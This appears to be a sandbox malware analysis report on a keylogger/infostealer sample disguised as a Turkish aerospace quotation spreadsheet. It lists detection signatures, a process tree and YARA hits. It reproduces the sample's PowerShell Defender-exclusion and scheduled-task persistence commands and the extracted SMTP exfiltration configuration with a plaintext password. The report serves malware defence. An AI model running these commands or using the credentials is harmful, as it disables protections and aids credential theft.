Edit tour

Windows Analysis Report
T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

Overview

General Information

Sample name:	T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe renamed because original name is a hash value
Original sample name:	Trk Havaclk ve Uzay Sanayii A TEKLF TALEB-19-02-2025_xlsx.exe
Analysis ID:	1618934
MD5:	1827b652ba6dea19fd150f4872ad8a90
SHA1:	386a46ca23659236a90f49e80516630da9f557f2
SHA256:	af991ddeba10d3b5f7d23603c840755386967bcb17175e3ff91dd52da78375b4
Tags:	exeuser-threatcat_ch
Infos:

Detection

MassLogger RAT, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected MassLogger RAT

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

.NET source code contains very large strings

.NET source code references suspicious native API functions

Adds a directory exclusion to Windows Defender

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe (PID: 3948 cmdline: "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe" MD5: 1827B652BA6DEA19FD150F4872AD8A90)

powershell.exe (PID: 4148 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WheTgQY.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 6672 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 5732 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmp957E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe (PID: 6404 cmdline: "C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe" MD5: 1827B652BA6DEA19FD150F4872AD8A90)

WheTgQY.exe (PID: 5456 cmdline: C:\Users\user\AppData\Roaming\WheTgQY.exe MD5: 1827B652BA6DEA19FD150F4872AD8A90)

schtasks.exe (PID: 7320 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmpECA5.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WheTgQY.exe (PID: 7384 cmdline: "C:\Users\user\AppData\Roaming\WheTgQY.exe" MD5: 1827B652BA6DEA19FD150F4872AD8A90)

WheTgQY.exe (PID: 7392 cmdline: "C:\Users\user\AppData\Roaming\WheTgQY.exe" MD5: 1827B652BA6DEA19FD150F4872AD8A90)

WheTgQY.exe (PID: 7400 cmdline: "C:\Users\user\AppData\Roaming\WheTgQY.exe" MD5: 1827B652BA6DEA19FD150F4872AD8A90)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000010.00000002.4483172378.0000000000432000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000010.00000002.4483172378.0000000000434000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000010.00000002.4491033663.00000000027F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000A.00000002.4483176808.0000000000435000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000010.00000002.4483172378.000000000043D000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.4491137274.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000010.00000002.4491033663.00000000028FC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.4491137274.0000000002B5C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e070:$a1: get_encryptedPassword 0x71090:$a1: get_encryptedPassword 0xb3eb0:$a1: get_encryptedPassword 0x2e5f8:$a2: get_encryptedUsername 0x71618:$a2: get_encryptedUsername 0xb4438:$a2: get_encryptedUsername 0x2dce3:$a3: get_timePasswordChanged 0x70d03:$a3: get_timePasswordChanged 0xb3b23:$a3: get_timePasswordChanged 0x2ddfa:$a4: get_passwordField 0x70e1a:$a4: get_passwordField 0xb3c3a:$a4: get_passwordField 0x2e086:$a5: set_encryptedPassword 0x710a6:$a5: set_encryptedPassword 0xb3ec6:$a5: set_encryptedPassword 0x30da2:$a6: get_passwords 0x73dc2:$a6: get_passwords 0xb6be2:$a6: get_passwords 0x31136:$a7: get_logins 0x74156:$a7: get_logins 0xb6f76:$a7: get_logins
00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36fc50:$a1: get_encryptedPassword 0x3b2c70:$a1: get_encryptedPassword 0x3f5a90:$a1: get_encryptedPassword 0x3701d8:$a2: get_encryptedUsername 0x3b31f8:$a2: get_encryptedUsername 0x3f6018:$a2: get_encryptedUsername 0x36f8c3:$a3: get_timePasswordChanged 0x3b28e3:$a3: get_timePasswordChanged 0x3f5703:$a3: get_timePasswordChanged 0x36f9da:$a4: get_passwordField 0x3b29fa:$a4: get_passwordField 0x3f581a:$a4: get_passwordField 0x36fc66:$a5: set_encryptedPassword 0x3b2c86:$a5: set_encryptedPassword 0x3f5aa6:$a5: set_encryptedPassword 0x372982:$a6: get_passwords 0x3b59a2:$a6: get_passwords 0x3f87c2:$a6: get_passwords 0x372d16:$a7: get_logins 0x3b5d36:$a7: get_logins 0x3f8b56:$a7: get_logins
Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 3948	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 3948	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 3948	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 3948	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 3948	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xcff59:$a1: get_encryptedPassword 0xd03f2:$a2: get_encryptedUsername 0xcfbee:$a3: get_timePasswordChanged 0xcfcf9:$a4: get_passwordField 0xcff6f:$a5: set_encryptedPassword 0xd2781:$a6: get_passwords 0xd2a58:$a7: get_logins 0xd276d:$a8: GetOutlookPasswords 0xd21af:$a9: StartKeylogger 0xd29c6:$a10: KeyLoggerEventArgs 0xd224f:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: WheTgQY.exe PID: 5456	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: WheTgQY.exe PID: 5456	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: WheTgQY.exe PID: 5456	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: WheTgQY.exe PID: 5456	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: WheTgQY.exe PID: 5456	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x48131:$a1: get_encryptedPassword 0x486af:$a2: get_encryptedUsername 0x47db3:$a3: get_timePasswordChanged 0x47eca:$a4: get_passwordField 0x48147:$a5: set_encryptedPassword 0x4ae0b:$a6: get_passwords 0x4b19b:$a7: get_logins 0x4adf7:$a8: GetOutlookPasswords 0x4a7b0:$a9: StartKeylogger 0x4b0f4:$a10: KeyLoggerEventArgs 0x4a850:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 6404	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 6404	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: WheTgQY.exe PID: 7400	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: WheTgQY.exe PID: 7400	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: WheTgQY.exe PID: 7400	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 26 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3948e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b31:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d8e:$a4: \Orbitum\User Data\Default\Login Data 0x3976d:$a5: \Kometa\User Data\Default\Login Data
0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
16.2.WheTgQY.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.WheTgQY.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
9.2.WheTgQY.exe.411c3d0.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.WheTgQY.exe.411c3d0.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
9.2.WheTgQY.exe.411c3d0.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.WheTgQY.exe.411c3d0.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
9.2.WheTgQY.exe.411c3d0.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3948e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b31:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d8e:$a4: \Orbitum\User Data\Default\Login Data 0x3976d:$a5: \Kometa\User Data\Default\Login Data
9.2.WheTgQY.exe.411c3d0.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
9.2.WheTgQY.exe.415f3f0.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.WheTgQY.exe.415f3f0.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
9.2.WheTgQY.exe.415f3f0.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.WheTgQY.exe.415f3f0.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
9.2.WheTgQY.exe.415f3f0.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3948e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b31:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d8e:$a4: \Orbitum\User Data\Default\Login Data 0x3976d:$a5: \Kometa\User Data\Default\Login Data
9.2.WheTgQY.exe.415f3f0.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70cc0:$a1: get_encryptedPassword 0xb3ae0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71248:$a2: get_encryptedUsername 0xb4068:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70933:$a3: get_timePasswordChanged 0xb3753:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x70a4a:$a4: get_passwordField 0xb386a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70cd6:$a5: set_encryptedPassword 0xb3af6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x739f2:$a6: get_passwords 0xb6812:$a6: get_passwords 0x30d66:$a7: get_logins 0x73d86:$a7: get_logins 0xb6ba6:$a7: get_logins
0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b28e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e2ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc10ce:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a931:$a3: \Google\Chrome\User Data\Default\Login Data 0x7d951:$a3: \Google\Chrome\User Data\Default\Login Data 0xc0771:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab8e:$a4: \Orbitum\User Data\Default\Login Data 0x7dbae:$a4: \Orbitum\User Data\Default\Login Data 0xc09ce:$a4: \Orbitum\User Data\Default\Login Data 0x3b56d:$a5: \Kometa\User Data\Default\Login Data 0x7e58d:$a5: \Kometa\User Data\Default\Login Data 0xc13ad:$a5: \Kometa\User Data\Default\Login Data
0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x72084:$s1: UnHook 0xb4ea4:$s1: UnHook 0x2f06b:$s2: SetHook 0x7208b:$s2: SetHook 0xb4eab:$s2: SetHook 0x2f073:$s3: CallNextHook 0x72093:$s3: CallNextHook 0xb4eb3:$s3: CallNextHook 0x2f080:$s4: _hook 0x720a0:$s4: _hook 0xb4ec0:$s4: _hook
9.2.WheTgQY.exe.415f3f0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.WheTgQY.exe.415f3f0.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
9.2.WheTgQY.exe.415f3f0.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.WheTgQY.exe.415f3f0.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70ac0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71048:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70733:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x7084a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70ad6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x737f2:$a6: get_passwords 0x30d66:$a7: get_logins 0x73b86:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x737de:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x73197:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x73adf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
9.2.WheTgQY.exe.415f3f0.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b28e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e0ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a931:$a3: \Google\Chrome\User Data\Default\Login Data 0x7d751:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab8e:$a4: \Orbitum\User Data\Default\Login Data 0x7d9ae:$a4: \Orbitum\User Data\Default\Login Data 0x3b56d:$a5: \Kometa\User Data\Default\Login Data 0x7e38d:$a5: \Kometa\User Data\Default\Login Data
9.2.WheTgQY.exe.415f3f0.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x71e84:$s1: UnHook 0x2f06b:$s2: SetHook 0x71e8b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x71e93:$s3: CallNextHook 0x2f080:$s4: _hook 0x71ea0:$s4: _hook
9.2.WheTgQY.exe.411c3d0.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.WheTgQY.exe.411c3d0.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
9.2.WheTgQY.exe.411c3d0.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.WheTgQY.exe.411c3d0.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70cc0:$a1: get_encryptedPassword 0xb3ae0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71248:$a2: get_encryptedUsername 0xb4068:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70933:$a3: get_timePasswordChanged 0xb3753:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x70a4a:$a4: get_passwordField 0xb386a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70cd6:$a5: set_encryptedPassword 0xb3af6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x739f2:$a6: get_passwords 0xb6812:$a6: get_passwords 0x30d66:$a7: get_logins 0x73d86:$a7: get_logins 0xb6ba6:$a7: get_logins
9.2.WheTgQY.exe.411c3d0.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b28e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e2ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc10ce:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a931:$a3: \Google\Chrome\User Data\Default\Login Data 0x7d951:$a3: \Google\Chrome\User Data\Default\Login Data 0xc0771:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab8e:$a4: \Orbitum\User Data\Default\Login Data 0x7dbae:$a4: \Orbitum\User Data\Default\Login Data 0xc09ce:$a4: \Orbitum\User Data\Default\Login Data 0x3b56d:$a5: \Kometa\User Data\Default\Login Data 0x7e58d:$a5: \Kometa\User Data\Default\Login Data 0xc13ad:$a5: \Kometa\User Data\Default\Login Data
9.2.WheTgQY.exe.411c3d0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x72084:$s1: UnHook 0xb4ea4:$s1: UnHook 0x2f06b:$s2: SetHook 0x7208b:$s2: SetHook 0xb4eab:$s2: SetHook 0x2f073:$s3: CallNextHook 0x72093:$s3: CallNextHook 0xb4eb3:$s3: CallNextHook 0x2f080:$s4: _hook 0x720a0:$s4: _hook 0xb4ec0:$s4: _hook
0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
